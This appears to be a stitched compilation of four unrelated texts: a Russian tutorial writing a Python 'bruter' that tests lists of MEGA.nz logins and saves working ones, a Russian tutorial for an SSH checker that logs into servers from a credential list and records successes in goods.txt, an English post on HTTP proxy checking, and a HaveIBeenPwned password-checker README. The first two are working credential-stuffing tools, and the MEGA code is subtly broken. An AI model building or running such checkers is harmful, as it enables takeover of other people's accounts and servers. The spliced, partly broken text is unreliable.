Писать мы будем чекер аккаунтов
.
Для создания чекера нам надо:
- Иметь установлений python ()
- Иметь желания и хоть какие то руки
- Текстовый редактор (Notepad ++, Visual Studio, PyCharm и прочие)
- Повторять все как в статье
Приступаем, после скачивания python. Установим нужные нам зависимости, то есть
.
Тыкаем WIN + R и пишем cmd, нажимаем enter. Вы открыли
.
В консоле пишем:
pip install DateTime && pip install mega.py
Ждем окончания загрузки, и закрываем cmd. Теперь создаем txt фалик и заменяем txt на py. Открываем его текстовый редактором (редактором кода), и начинаем кодить.
from mega import Mega
mega = Mega()
Импортируем библиотеку Mega, которая нам надо для самой функции брута.
Сделаем еще два импорта (можно и без них, но придется изменять код) они просто для удобства
import datetime
import sys
Теперь сделаем def в который будет спрашивать названия файлика с базой для бурта, и проверять что ввел юзер (если он ввел название без .txt окончание то добавлять его).
def main():
print('MEGA.NZ ACCOUNTS BRUTER BY SHIFTERn')
print('Поместите базу для брута в директорию с этим скриптом')
q = str(input('Введите название файла (базы для брута): '))
if '.txt' in q:
dir_ = q
else:
dir_ = q + '.txt'
checker(dir_)
def — Оболочка с кодом так сказать.
— выводить текст в консольку
— запрашивает текст (дает пользователю ввести текст)
— операторы. Если произойдет это действие то будет так, если произойдет иначе будет так.
checker(dir_) — перенаправление на другой def под названием checker (который уже и будет чекать аккаунт на валид). Также мы через это перенаправлением передаем аргумент (args) под названием dir_ то есть то что ввел пользователь
Теперь сделаем что бы def main() работал.
Осталась последняя часть. Сам чекер, для новеньких в этой сфере ничего не будет понятно скорее всего, но постараюсь объяснить.
Между импортами и def main() (см. скрин выше) пишем:
Мы опять создали оболочку где будет храниться и выполняться наш код чекера.
Теперь будем использовать ранее импортированную библиотеку datetime. Для чего? Да что бы сохранять наш файлик с прочеканой базой время когда начался брут.
Пишем:
date = str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').replace('.', '-')
file_name = 'output_' + date + '.txt'
Мы создали переменную date, которая выдает точное время (2021-02-22 16:49:06.035025 например.)
и что бы не было ошибки что нельзя сделать файлик с названием в котором есть «:» мы их заменяем функцией
на ‘-‘.
Потом же создаем переменную которая обозначает название файлика где будет сохранен результат.
Теперь сделаем обработку ошибок, что бы при ошибке скрипт не падал, а просто показывал ошибку.
Пишем:
try:
except Exception as e:
print(e)
as — логично с анг. «как».
то есть мы ловим ошибку как e и потом выводим ошибку.
Приступаем к созданию файлика где будет результат и чтению файлика с базой для дальнейших действий. Пишем между try: и except: данный код
with open(file_name, 'w', encoding='utf-8') as f:
f.write('MEGA.NZ ACCOUNTS:nn')
with open(dir_, 'r', encoding='utf-8') as accounts:
мы юзаем конструкцию
. Т.к. она автоматически закрывает файлик.
accounts = accounts.read()
этим кодом просматриваем содержимое нашего файлика под переменной dir_ .
Напишем проверку используя операторов If, else.
if len(accounts) >= 1:
account = accounts.split('n')
len — с англ. сокращено от слова Leng, длина. Мы проверяем на то что в фалике больше 1 символа, иначе выводим ошибку:
else:
sys.exit('Файл ' + dir_ + ' пустой!')
Используя встроенную библиотеку в python — sys. Подробней о библиотеке
Если же в файлике больше одного символа то срабатывает код который мы сейчас будем писать. На данный момент, создаётся переменная account которая содержит в себе аккаунты. Также мы использовали метод
который обрезает строку по заданным параметрами. В нашем случае мы разделяем весь файлик на много строк (ну то есть 1 строка в файлике — 1 строка в переменной. Они записываются
.)
‘n’ это перенос строки на 1 вниз.
Теперь между if и else (см. скрин выше) пишем еще одну проверку на то что выводить в соответствии от кол-ва аккаунтов в текстовом документе (если 1 — аккаунта, если 0 или больше 1 то аккаунтов)
if str(len(account)) == '1':
q = 'a'
else:
q = 'ов'
И выводим методом print() то сколько аккаунтов чекер будет чекать:
print('Начинаю проверку ' + str(len(account)) + ' аккаунт' + q)
Окончание: сам чекер
Используем
мы по очереди начинаем выполнять код который будет ниже.
Снов пишем конструкцию try: except: которая в этом случае будет мало ли того что поможет скрипту не падать, да и еще определять валидный ли аккаунт.
try:
acc = account.split(':')
mega.login(acс[0], acc[1])
print("[+] " + account)
output = open(file_name, 'a', encoding='utf-8')
output.write(account + 'n')
output.close()
except:
print(f"[-] {account}")
Это последние строки кода. В цикле, мы начинаем ловить ошибку, выполняем код:
разделяем строку на логин и пароль методом split который мы уже использовали выше)
Используем библиотеку mega и пробуем выполнить вход в аккаунт:
mega.login(acс[0], acc[1])
если пароль или логин не верный скрипт должен был упасть, но мы сделали конструкцию try: except благодаря чему он не падает. А выводить ошибку что аккаунт не валидный:
except:
print(f"[-] {account}")
Если же аккаунт валид — выводим это:
и сохраняем его в файлик под названием значения нашей переменной file_name:
output = open(file_name, 'a', encoding='utf-8')
output.write(account + 'n')
output.close()
Открываем файлик с режимом A что обозначает, что аккаунты будут дописываться в файл. Также используем encoding, здесь очевидно. Но все же, это для того что бы при сохранение файлика случайно не вышло такого:
На этом наш кодинг закончился..
Наш итоговый код:
from mega import Mega
mega = Mega()
import datetime
import sys
def checker(dir_):
date = str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').replace('.', '-')
file_name = 'output_' + date + '.txt'
try:
with open(file_name, 'w', encoding='utf-8') as f:
f.write('MEGA.NZ ACCOUNTS:nn')
with open(dir_, 'r', encoding='utf-8') as accounts:
accounts = accounts.read()
if len(accounts) >= 1:
account = accounts.split('n')
if str(len(account)) == '1':
q = 'a'
else:
q = 'ов'
print('Начинаю проверку ' + str(len(account)) + ' аккаунт' + q)
for account in account:
try:
acc = account.split(':')
mega.login(acс[0], acc[1])
print("[+] " + account)
output = open(file_name, 'a', encoding='utf-8')
output.write(account + 'n')
output.close()
except:
print(f"[-] {account}")
sys.exit('Брут закончен! Результат сохранен в ' + file_name)
else:
sys.exit('Файл ' + dir_ + ' пустой!')
except Exception as e:
print(e)
def main():
print('MEGA.NZ ACCOUNTS BRUTER BY SCAMMEMSn')
print('Поместите базу для брута в директорию с этим скриптом')
q = str(input('Введите название файла (базы для брута): '))
if '.txt' in q:
dir_ = q
else:
dir_ = q + '.txt'
checker(dir_)
main()
Переходим к запуску скрипта:
Отрываем cmd (командную строку);
Пишем cd путь/к/файлику.py
Потом пишем python файлик.py
Вводим название файла где храниться база для брута. Ожидаем не много времени, и готово! База сохранена в файлику под названием времени когда был запущен брут.
Приветствую всех, кто изучает Python и хочет перейти от сухой теории к практическому применению полученных знаний.
Просмотрев форум codeby.net нашел несколько материалов, где авторы делились своим опытом и пробовали свои силы в написании небольших скриптов. К сожалению большинство авторов использовали процедурный тип написания кода. В то время как создание, поддержание и развитие приложения даже средней сложности требует ООП подхода.
Попробуем в небольшом проекте применить ООП, в самом простом виде.
Автор будет очень благодарен более опытным товарищам, если они наставят на путь истинный и, возможно, дадут пару подзатыльников для дальнейшего развития в нужном направлении.
Не смотря на свой возраст — автор начинающий программист-любитель, самоучка, а без посторонней помощи в программировании можно барахтаться годами примерно на одном уровне. Именно поэтому и пишу.
Для тех, кто сразу хочет развернуть проект, скачиваем архив и в папке с архивом выполняем:
Python:
pip install -r requirements.txt
Полный текст программы можно посмотреть в конце поста под спойлером «Весь код».
Итак, приступим. Имеем на входе — текстовый файл, назовем его ‘ssh_nocheck.txt’ со строками вида:
Python:
username password ipaddress port
Соответственно: логин, пароль, адрес SSH сервера, порт для подключения.
Нужно проверить каждый хост (строку файла) на возможность подключения.
Учетные данные и адрес сервера, принявшего соединение, записать в файл, назовем его goods.txt.
Для тестирования работы скрипта понадобятся SSH аккаунты. Есть сервисы на которых их можно получить легально и бесплатно.
Здесь каталог ссылок на такие сервисы.
Ссылка скрыта от гостей
, к сожалению много мертвых.
Автор воспользовался этим:
Ссылка скрыта от гостей
Раз уж мы решили применить ООП, посмотрим какие сущности у нас есть в поставленной задаче:
1. файл со списком серверов, нуждающихся в проверке;
2. файл для записи списка серверов, ответивших на запрос при проверке;
3. сам сервер, который нужно проверить, в виде строки во входящем файле.
После написания кода заметил, что дублируются операции по работе с файлами и решил вывести все, что касается файловых операций в отдельный класс.
Таким образом получилось 4 класса:
- class InputOutput — будет отвечать за чтение/запись в файл
- class InputList — будет получать данные из файла-списка и хранить некоторые параметры при работе программы
- class Host — будет хранить данные каждого хоста и методы по обработке
- class OutputList — будет сохранять в новый файл список серверов, прошедших проверку
Продвигаться в написании классов будем по порядку решения поставленной задачи.
Начнем с точки входа в программу. По умолчанию это метод main.
Python:
def main():
parser = cmd_arg_parser()
namespace = parser.parse_args(sys.argv[1:])
input_f = namespace.input_file
output_f = namespace.output_file
output_list = OutputList()
input_list = InputList()
host = Host()
io = InputOutput(input_f, output_f, input_list, output_list)
input_list.handling_list(output_list, host, io)
print('Filtered:', input_list.bad_host_count, 'bad hosts.', 'Passed the test:', output_list.count_of_good_hosts, 'hosts')
Пропустим пока строки 2-5. В строках 6-9 создаются объекты на основе классов.
Обратите внимание на строки 8 и 9. Здесь не просто создаются объекты, но им передаются другие объекты.
Так в строке 8 создается объект Host() и присваевается переменной host. В скобках передаются два объекта, которые были созданы в строками выше — это объекты входящего и исходящего списков. Они передаются в объект Host(), что бы он мог взаимодействовать со списками: менять значения их полей и использовать их методы.
В строке 10 вызывается метод объекта input_list. Обращение к методу объекта происходит через переменную, которой присвоен этот объект, после которой ставится точка.
После точки можно обратится к полю объекта или вызвать метод. Если вызывается метод, то он заканчивается круглыми скобками. Внутри скобок передаются параметры, необходимые для нормальной работы метода. В данном случае передаются 3 объекта.
Переходим к созданию классов.
Поскольку сначала нужно получить данные для проверки создадим класс class InputList.
Проанализируем какие атрибуты (поля класса) будут у объекта.
Python:
class InputList:
def __init__(self):
self.host_count = 0
self.bad_host_count = 0
self.current_line_count = 0
def __init__(self): это метод конструктор, он выполняется при создании объекта InputList.
self.host_count = 0 количество проверяемых ssh серверов
self.bad_host_count = 0 количество серверов, не ответивших на запрос
self.current_line_count = 0 номер текущей строки файла, из которого читается список
Все поля пустые, потому, что вновь созданный объект не загрузил пока никакие данные.
Создаем класс OutputList.
Python:
class OutputList:
def __init__(self):
self.count_of_good_hosts = 0
Конструктор очень простой, все, что мы будем хранить в объекте это количество проверенных хостов, они будут записаны в файл.
Создаем класс Host.
Python:
class Host:
def __init__(self):
self.user = None
self.password = None
self.ip = None
self.port = None
self.location = None
self.start_time = timer()
self.host_access_time = 0
В полях этого класса будут хранится учетные данные и адрес сервера, а так же его геолокация, и время доступа при авторизации на сервере.
Последний класс, который мы создадим это класс, отвечающий за файловые операции — InputOutput.
Python:
class InputOutput:
def __init__(self, input_f, output_f, input_list, output_list):
self.output_file = output_f
self.input_file = input_f
self.output_list = output_list
self.input_list = input_list
В конструктор передаются имена входящего файла и файла с результатом, а так же объекты списков.
Теперь приступим к созданию методов классов. А вот тут начинаются сложности с объяснением. Для более ясного понимания лучше смотреть весь файл с программой, куски с комментариями будут просто подсказками.
Продолжаем наполнять класс InputList. Для начала узнаем сколько хостов нужно будет проверить, подсчитав количество строк в файле.
Python:
def hosts_counter(self, io):
print('Counting host in file:', io.input_file)
for line in io.read_data_from_file(flag='r'):
self.host_count += 1
return self.host_count
Для этого нужно прочитать файл. При чтении файла обычно создается список его содержимого (список списков строк), который помещается в оперативную память. Здесь есть определенная проблема — если файл будет достаточно большой, а ресурсы сервера ограничены, то чтение большого файла может израсходовать всю оперативную память виртуальной машины и привести системы в уход в swap. Чтобы такого не случилось лучше читать, обрабатывать и записывать по одной отдельной строке из файла.
Первый аргумент метода hosts_counter — self. self ссылается на сам класс, указывая, что это не какая то внешняя функция а именно метод этого класса. Поскольку все файловые операции будет выполнять класс InputOutput, вторым аргументом передается ссылка на объект io (см. метод main).
Во второй строке мы выводим на печать текст с переменной io.input_file — это обращение к полю объекта io с названием input_file.
Дальше создаем цикл, который последовательно прочтет все строки файла. На этот раз вызывается метод объекта io — read_data_from_file(flag=’r’) с именованным аргументом, который будет использоваться далее при открытии файла в режиме «только чтение». Если строка файла прочитана и не вызвано исключение в методе io.read_data_from_file(), то счетчик хостов увеличивается на единицу self.host_count += 1. В последней строке функция возвращает с помощью оператора return результат своей работы — поле объекта input_list подсчитанную сумму строк: self.host_count.
В методе hosts_counter() была ссылка на метод объекта io io.read_data_from_file() — создадим его в классе InputOutput.
Python:
def read_data_from_file(self, flag):
try:
with open(self.input_file, flag) as file:
for line in file:
yield line.strip().split(' ')
except IOError:
print("can't read from file, IO error")
exit(1)
Вот здесь и появился именованный аргумент флаг. Действие функции обернуты в try-except для предотвращения падения программы без выясненной причины. В нашем случае если файл по какой то причине не может быть прочитан, то продолжать выполнение программы бессмысленно, поэтому она завершится после сообщения об ошибке ввода-вывода. И вот мы пришли к тому, что было сказано ранее о необходимости чтения файла и дальнейшей его обработки построчно. Это достигается использованием оператора yield. Если кратко, yield останавливает выполнения цикла до следующего вызова итератора цикла. То есть если просто вызвать где то в коде метод read_data_from_file() он прочтет только 1-ую строку файла и приостановит свою работу. Для того, что бы он отработал по всем строкам файла, метод должен быть вызван внутри другого цикла, в нашем случае он является итерируемым объектом (for line in io.read_data_from_file) в методе hosts_counter. Команда line.strip().split(‘ ‘) убирает символ перехода на новую строку и разбивает строку на подстроки по разделителю пробел. Таким образом данные о хосте выглядят как строка строк [[login], [pass], [ip], [port]].
Мы вынужденно отвлеклись от создания методов класса InputList, снова возвращаемся к нему.
Переходим к созданию метода, фактически управляющего всей последующей программой. Метод находится в InputList по той причине, что далее идет обработка данных именно этого списка. Но такое решение вопрос спорный и возможно такой метод было бы лучше разместить в функции main?
Напишите ваше мнение о размещении этого метода в комментариях.
Python:
def handling_list(self, output_list, host, io):
print('Found', self.hosts_counter(io), 'hosts in list of file', io.input_file)
for line in io.read_data_from_file(flag='r'):
self.current_line_count += 1
print('handling line#', self.current_line_count)
check_result = host.check_host_data(line)
if check_result:
host.extract_host_data_from_line(line)
connection = host.connect_to_host()
if connection:
prepare_data = output_list.prepare_data_to_write(line, host)
write_line = io.write_data_to_file(prepare_data, output_list, flag='a')
if write_line:
print('recorded line#', output_list.count_of_good_hosts, 'of', self.host_count)
else:
self.bad_host_count += 1
else:
self.bad_host_count += 1
Переходим к классу Host. Метод проверки данных для подключения check_host_data().
Python:
def check_host_data(self, line):
print('Checking data of host', line[2])
if len(line) == 4:
return True
else:
print('no valid data in line')
return False
Цикл, во второй строке дублирует цикл из предыдущего метода, проходя по итерируемому объекту читает строки из файла, увеличивая счетчик текущей строки на единицу, а затем переходит к строке проверки данных строки check_result = host.check_host_data(line). Дело в том, что данные в строке могут быть не корректны, например, может не хватать порта или пароля. Если список len(line) == 4 содержит 4 объекта, то проверка пройдена. Можно переходить к попытке подключения check_host(). Мы все еще в классе Host.
Python:
def check_host(self, line):
if self.extract_host_data_from_line(line):
print("Trying to connect to %s" % self.ip)
self.connect_to_host()
return True
else:
return False
Если удается извлечь все данные для подключения if self.extract_host_data_from_line(line), то можно подключаться.
Обратите внимание, переменные с self.user присваивают значением полям объекта Host. Специфика данного случая в том, что все созданные объекты находятся в единичном экземпляре. Даже вроде бы такой объект как host, нужен лишь при проверке своих данных, а дальше его поля перезаписываются данными из следующей строки.
Python:
def extract_host_data_from_line(self, data):
self.user = data[0]
self.password = data[1]
self.ip = data[2]
self.port = data[3]
return True
После заполнения всех необходимых переменных для подключения делаем попытку соединения сервером self.connect_to_host() (мы все еще в классе Host)
Python:
def connect_to_host(self):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=self.ip, username=self.user, password=self.password, port=self.port, timeout=3)
print('Connected to host', self.ip, 'Access time to host:', self.access_time(), 'seconds')
return True
except paramiko.AuthenticationException:
print("Authentication failed when connecting to", self.ip)
print('Host marked as bad.')
return False
except ConnectionError:
print("Could not connect to %s" % self.ip)
return False
Для работы используется библиотека paramiko, ее предварительно нужно установить
и импортировать в файле
Дальше дело самой библиотеки — создать подключение с учетными данными которые мы ей предоставим. Если подключение установлено, считаем проверку законченной. Если соединится не получилось, то тут два варианта либо сервер недоступен except ConnectionError:, либо неправильные учетные данные except paramiko.AuthenticationException:.
self.access_time() — считает время потраченное на подключение, что то вроде пинга, для которого я не нашел простого решения для Python, — все библиотеки, рассмотренные мной, вызывали нативную для ОС системную команду ping, вывод которой нужно было парсить.
Python:
def access_time(self):
self.host_access_time = timer() - self.start_time
return round(self.host_access_time, 2)
Возвращаемся к методу handling_list() класса InputList.
Python:
if connection:
prepare_data = output_list.prepare_data_to_write(line, host)
Если соединение с сервером завершилось удачно, подготавливаем данные для записи в файл goods.txt. Работа с данными для результирующего файла возложена на метод prepare_data_to_write() класса OutputList. Превращаем все данные в строки иначе их не удастся объединить в одну строку, не забывая добавить в конце символ перехода на новую строку ‘n’, и возвращаем новую строку с данными для записи.
Python:
def prepare_data_to_write(self, line, host):
joined = ' '.join(line) + ' '
location = str(host.get_location(host.ip)) + ' '
accsesstime = str(host.host_access_time)
new_line = joined + location + accsesstime + 'n'
return new_line
В файл goods.txt будут выводится не только учетные данные из исходного файла, но и время доступа к серверу во время попытки подключения и геолокация сервера.
Для определения местоположения сервера используется библиотека geoip2, ее предварительно нужно установить
и импортировать в файле
Для работы библиотеки скачиваем файл базы отсюда
Ссылка скрыта от гостей
. И в класс Host добавляем метод
get_location(), который получает параметр в виде адреса, библиотека ищет совпадение по БД и возвращает результат в виде название страны на английском.
Python:
def get_location(self, ip):
reader = geoip2.database.Reader('GeoLite2-Country.mmdb')
response = reader.country(ip)
return response.country.names['en']
Снова возвращаемся к методу handling_list() класса InputList.
Python:
write_line = io.write_data_to_file(prepare_data, output_list, flag='a')
if write_line:
print('recorded line#', output_list.count_of_good_hosts, 'of', self.host_count)
Пишем подготовленную строку в файл с помощью метода write_data_to_file() класса InputOutput. Управляющая конструкция с циклом for line in io.read_data_from_file(flag=’r’) находится в методе handling_list() класса InputList.
Python:
def write_data_to_file(self, line, output_list, flag):
try:
with open(self.output_file, flag) as file:
file.write(line)
output_list.count_of_good_hosts += 1
return True
except IOError:
print("Can't write to output file, IO error")
exit(1)
Аналогично, как и при чтении файла, заворачиваем всю конструкцию в try-except, с одной особенностью — параметр передаваемый при открытии файла будет не ‘r’, как при чтении, а ‘a’ add, строки будут добавлятся. В случае удачной записи поле с переменной проверенных хостов увеличивается на единицу. Если по каким то причинам запись невозможно работа программы будет остановлена.
Осталось обсудить первые несколько строк в функции main().
Для того, что бы можно было вводить собственные имена файлов для ввода ввода-вывода нужно обрабатывать аргументы переданные программе во время запуска. Для этого будет использоваться библиотеку argparse.
в файле
Работу парсера вынесем в отдельную функцию cmd_arg_parser().
Создаем объект парсера:
Python:
parser = argparse.ArgumentParser()
и передаем ему два аргумента для входящего и исходящего файла
Python:
parser.add_argument('-i', '--input_file', default='ssh_nocheck.txt')
parser.add_argument('-o', '--output_file', default='goods.txt')
именованные аргументы default используются для имен файлов по умолчанию, если при старте программы пользователь не ввел собственные имена файлов.
Python:
def cmd_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_file', default='ssh_nocheck.txt')
parser.add_argument('-o', '--output_file', default='goods.txt')
return parser
def main():
parser = cmd_arg_parser()
namespace = parser.parse_args(sys.argv[1:])
input_f = namespace.input_file
output_f = namespace.output_file
Вот и все, 164 строки кода.
Python:
#!/usr/bin/python
import paramiko
from timeit import default_timer as timer
import sys
import argparse
import geoip2.database
class InputOutput:
def __init__(self, input_f, output_f, input_list, output_list):
self.output_file = output_f
self.input_file = input_f
self.output_list = output_list
self.input_list = input_list
def read_data_from_file(self, flag):
try:
with open(self.input_file, flag) as file:
for line in file:
yield line.strip().split(' ')
except IOError:
print("can't read from file, IO error")
exit(1)
def write_data_to_file(self, line, output_list, flag):
try:
with open(self.output_file, flag) as file:
file.write(line)
output_list.count_of_good_hosts += 1
return True
except IOError:
print("Can't write to output file, IO error")
exit(1)
class Host:
def __init__(self):
self.user = None
self.password = None
self.ip = None
self.port = None
self.location = None
self.start_time = timer()
self.host_access_time = 0
def access_time(self):
self.host_access_time = timer() - self.start_time
return round(self.host_access_time, 2)
def get_location(self, ip):
reader = geoip2.database.Reader('GeoLite2-Country.mmdb')
response = reader.country(ip)
return response.country.names['en']
def check_host_data(self, line):
print('Checking data of host', line[2])
if len(line) == 4:
return True
else:
print('no valid data in line')
return False
def extract_host_data_from_line(self, data):
self.user = data[0]
self.password = data[1]
self.ip = data[2]
self.port = data[3]
return True
def connect_to_host(self):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=self.ip, username=self.user, password=self.password, port=self.port, timeout=3)
print('Connected to host', self.ip, 'Access time to host:', self.access_time(), 'seconds')
return True
except paramiko.AuthenticationException:
print("Authentication failed when connecting to", self.ip)
print('Host marked as bad.')
return False
except ConnectionError:
print("Could not connect to %s" % self.ip)
return False
def check_host(self, line):
if self.extract_host_data_from_line(line):
print("Trying to connect to %s" % self.ip)
self.connect_to_host()
return True
else:
return False
class OutputList:
def __init__(self):
self.count_of_good_hosts = 0
def write_data(self, io, data):
io.write_data_to_file(data, flag='a')
def prepare_data_to_write(self, line, host):
joined = ' '.join(line) + ' '
location = str(host.get_location(host.ip)) + ' '
accsesstime = str(host.host_access_time)
new_line = joined + location + accsesstime + 'n'
return new_line
class InputList:
def __init__(self):
self.host_count = 0
self.bad_host_count = 0
self.current_line_count = 0
def hosts_counter(self, io):
print('Counting host in file:', io.input_file)
for line in io.read_data_from_file(flag='r'):
self.host_count += 1
return self.host_count
def handling_list(self, output_list, host, io):
print('Found', self.hosts_counter(io), 'hosts in list of file', io.input_file)
for line in io.read_data_from_file(flag='r'):
self.current_line_count += 1
print('handling line#', self.current_line_count)
check_result = host.check_host_data(line)
if check_result:
host.extract_host_data_from_line(line)
connection = host.connect_to_host()
if connection:
prepare_data = output_list.prepare_data_to_write(line, host)
write_line = io.write_data_to_file(prepare_data, output_list, flag='a')
if write_line:
print('recorded line#', output_list.count_of_good_hosts, 'of', self.host_count)
else:
self.bad_host_count += 1
else:
self.bad_host_count += 1
def cmd_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_file', default='ssh_nocheck.txt')
parser.add_argument('-o', '--output_file', default='goods.txt')
return parser
def main():
parser = cmd_arg_parser()
namespace = parser.parse_args(sys.argv[1:])
input_f = namespace.input_file
output_f = namespace.output_file
output_list = OutputList()
input_list = InputList()
host = Host()
io = InputOutput(input_f, output_f, input_list, output_list)
input_list.handling_list(output_list, host, io)
print('Filtered:', input_list.bad_host_count, 'bad hosts.', 'Passed the test:', output_list.count_of_good_hosts, 'hosts')
if __name__ == "__main__":
main()
This is a deep dive into a proxy checker I wrote here. It assumes the reader already knows what proxies are and wants to see how they can be analyzed with Python 3. In this first part we’ll explore what’s involved in proxy checking and look at the code for establishing a connection to a network resource through a proxy.
Starting Out
When asking whether a proxy is working, we need to differentiate from the point of view of a source or a target. Confirming that a proxy is working from the point of view of the source means successfully requesting an external or internal network resource. If a connection through a proxy is established and the resource is obtained (a file, a printer connection, a webservice connection, etc.) – the proxy is considered functional. Checking whether a proxy is working from the target’s point of view is more involved and may consist of asking one of the following:
Is the requestor a proxy, and if so, what level of anonymity does it provide?
Is the requestor not a proxy i.e. are we testing an elite proxy?
For the purposes of this post we are focusing on testing proxies via HTTP. Also known as web proxies that understand the HTTP protocol and are able to alter their output headers. This leads to the rise of proxy anonymity classification levels such as Transparent, Anonymous, Elite, etc.
Headers
For a quick overview of headers involved in the analysis we’ll focus on the most common subset that proxies include in their requests to target servers.
Via
X-Via
X-Forwarded-For
X-Forwarded-Proto
X-Forwarded-Port
Proxy-Connection
Cdn-Src-Ip
X-IMForwards
HTTP_VIA
HTTP_FORWARDED_FOR
Forwarded
The top half of these appear in the majority of HTTP requests from transparent or anonymous proxies. A proxy that doesn’t hide the source IP and that labels itself a proxy will most likely include this information in the Via and X-Forwarded-For headers. At the other extreme, an elite proxy is likely to omit these fields to masquerade as the original requestor. Headers starting with X are non-standard but still widely used. The last field – Forwarded – is a proposed standard and applications wishing to be standards compliant should use it.
Making The Call
We begin as a source host requesting an external network resource – the HTML from http://www.google.com . The source host needs to accomplish two objectives:
1. Connect successfully to the proxy host
2. Receive the correct HTML
When exploring proxies I was surprised to find that some proxies were not returning the HTML requested. It would either be an error message from the proxy itself or the HTML requested but surrounded by additional tags. So to say that a proxy is functional just because it accepts connection requests from the source host is not sufficient.
In our code we’ll make use of Python’s urllib.request module, although the Requests package is a popular alternative for handling HTTP with a simplified interface.
import urllib.request proxy_handler = urllib.request.ProxyHandler({‘http’: ‘213.244.94.98:8080’}) opener = urllib.request.build_opener(proxy_handler) urllib.request.install_opener(opener) request = urllib.request.Request(‘http://www.google.com’, headers={‘User-Agent’:‘Tester’}) try: response = urllib.request.urlopen(request).read().decode(«utf-8») except(urllib.request.URLError, urllib.request.HTTPError, http.client.HTTPException) as e: #… handle errors … |
Line 3: A urllib.request.ProxyHandler accepts a dictionary of protocol and proxy pairs. Handlers, as described here, do the heavy lifting of opening URLs for specific schemes (https, ftp, etc.). For our purposes, we are configuring a handler with a single proxy only. Note also the use of
‘http’ . Remember that proxies operate across multiple protocols and we are focusing on processing HTTP in this example.
Line 4: The
urllib.request.build_opener() is a convenience function for creating instances of the urllib.request.OpenerDirector class. Openers manage chains of handlers and, by default, the
build_opener() creates an opener with a few default handlers pre-installed, including a default ProxyHandler. The default ProxyHandler configures itself with proxies from the environment variables. Since we supply a proxy programatically in this example – a custom ProxyHandler was created instead.
Line 5: Calling
install_opener() will make the provided opener the default when calling
urlopen() .
Line 6: The urllib.request.Request object simplifies the exchange of requests and responses of the HTTP protocol. Passing a request object into
urlopen() fetches the URL and returns a response in a single call. Additional features provided by the Request object includes passing of custom headers, as well as POST data. Unless specified, urllib uses the GET method when making a request.
Note the use of the header User-Agent in the last line. When ommited, urlib supplies it’s own, for example: User-Agent : Python-urllib/3.4. In an effort to prevent programmatic connections, some websites block requests containing such default headers.
The
try ... catch block makes the actual call using
urlopen() to fetch the HTML. Should the connection to the proxy fail (we are assuming that a connection to Google will go through) some of the possible errors are mentioned in the except block. It’s important to reiterate that it’s critical to confirm that the HTML returned from the proxy is the same HTML you get when manually checking the URL source. The purpose of
decode(«utf-8») will be explained in Part 2 of this series.
For more information about proxies, anonymity and headers take a look at the excellent resources below:
Proxy Server Wiki
AnonymousProxy
Forwarded HTTP Extension
Subscribe to the RSS feed or check back soon for Part 2!
Python-Password-Checker
TITLE :- PASSWORD CHECKER
DESCRIPTION :- Script to check how many times a password has been hacked using Password API
ABOUT THE PROJECT :-
In this project we are going to build a tool that can be used in real world to securely check if your passwords have ever been hacked. we are going to use 2 types of methods:-
- Using Console (Console_PswdChecker.py)
- Using Text File (TxtFile_PswdChecker.py)
-
Using Console
-> In first type we are going to enter the inputs through console.
-> Here inputs means passwords.
-> We can give any number of inputs by giving spaces.
-
Using Text File
-> In second type we are going to save our passwords in simple text file that is .txt .
-> We then open our text file and read our passwords line by line.
-> Here also we can save any number of passwords.
DATA BREACH :-
- Our passwords gets leaked all the time.
- Ever heard of Data breaches? A data breach is the intentional or unintentional release of secure or private/confidentional information to an untrusted environment.
example:- facebook, linkdIn, yahoo etc, has been hacked with data breaches. - All these companies sometimes leaks their databases therefore, our usernames and passwords gets leaked to the public.
- Hackers compile these lists of usernames and passwords and try to login to different services.
THE OFFICIAL WEBSITE :-
- As explained above, there are databases or we can think them as massive excel files of all emails and passwords that have ever been leaked throughout the history.
- Using these databases there is a website called https://haveibeenpwned.com/ created by Troy Hunt where we can check whether our emails or passwords have ever been pawned or not.
- But remember even though this website is trustworthy which also uses https a secured way of transferring data, yet we should not trust because the best security is to not trust anything.
- Because what happens here is, whenever we enter our passwords or emails it will be transferred to the servers somewhere around the world throught the internet
- And that is why we build our own tool in our own PC to securely check our passwords.
- And this above mentioned website gives us a API called Password API using which we will be builiding our tool.
HASH Functions :-
- One needs to always Hash or Encrypt their passwords before storing it.
- A Hash function is simply a function that generates a value of fixed length for each given input.
- There are many Algorithms of Hash functions such as SHA1, MD5, SHA256 etc.
- https://passwordsgenerator.net/sha1-hash-generator/ —>Using this website we can hash our passwords.
- As mentioned before, the Password API uses SHA1 Algorithm for hashing the passwords.
- For example, let password123 be a password, the hashed form is going to be ‘CBFDAC6008F9CAB4083784CBD1874F76618D2A97’. And no matter how many times I give password123 the hashed form is going to be the same, This technique is called Idempotent.
THE REQUIRED TOOLS :-
-
sys module : The sys module is built in module which comes along with python interpreter.
-
requests module : The requests module is not a built in module, This module needs to be downloaded.
This module is used to make requests to the browser during runtime. -
hashlib module : The hashlib module is not a built in module, this module needs to be downloaded.
This module is used to hash our password during runtime.
THE PASSWORD API :-
import requests
url = 'https://api.pwnedpasswords.com/range/' + [hashedpassword]
res = requests.get(url)
-
The first step is to import a requests module.
-
The requests module is going to allow us to make a request to haveibeenpwnd website through browser.
-
Its kinda like having browser without a actual browser.
-
The second step is to assign a Password API url to a variable named ‘url’.
-
Here hashedpassword is the hashed form of your password.
-
As the example mentioned above, the hashed password for ‘password123’ is ‘CBFDAC6008F9CAB4083784CBD1874F76618D2A97’.
-
But in the url we just pass the 5prefix of your hashed password.
-
So the code will basically look like,
import requests url = 'https://api.pwnedpasswords.com/range/' + 'CBFDA' res = requests.get(url)
-
Third step is to request API through request.get(url) method and assigning it to a variable called ‘res’.
K-ANONYMITY ;-
- This is a modern technique that big companies like FAANG use to protect the privacy of their customers.
- K-Anonymity allows somebody to receive information about us but yet still not know who we are.
- The way this works is that we only give the first 5 characters of our hashed passwords.
- The Password API has the list of all the passwords that have been leaked, However all these passwords are hashed with SHA1 Algorithm.
- So its going to look in its databases of all these passwords and pick all the hashed passwords that has these first 5 characters.
- Hence in response we will get all the hashed passwords which has these first 5 characters and then we can compare our entire hashed password with the list of response hashed passwords in our own PC.
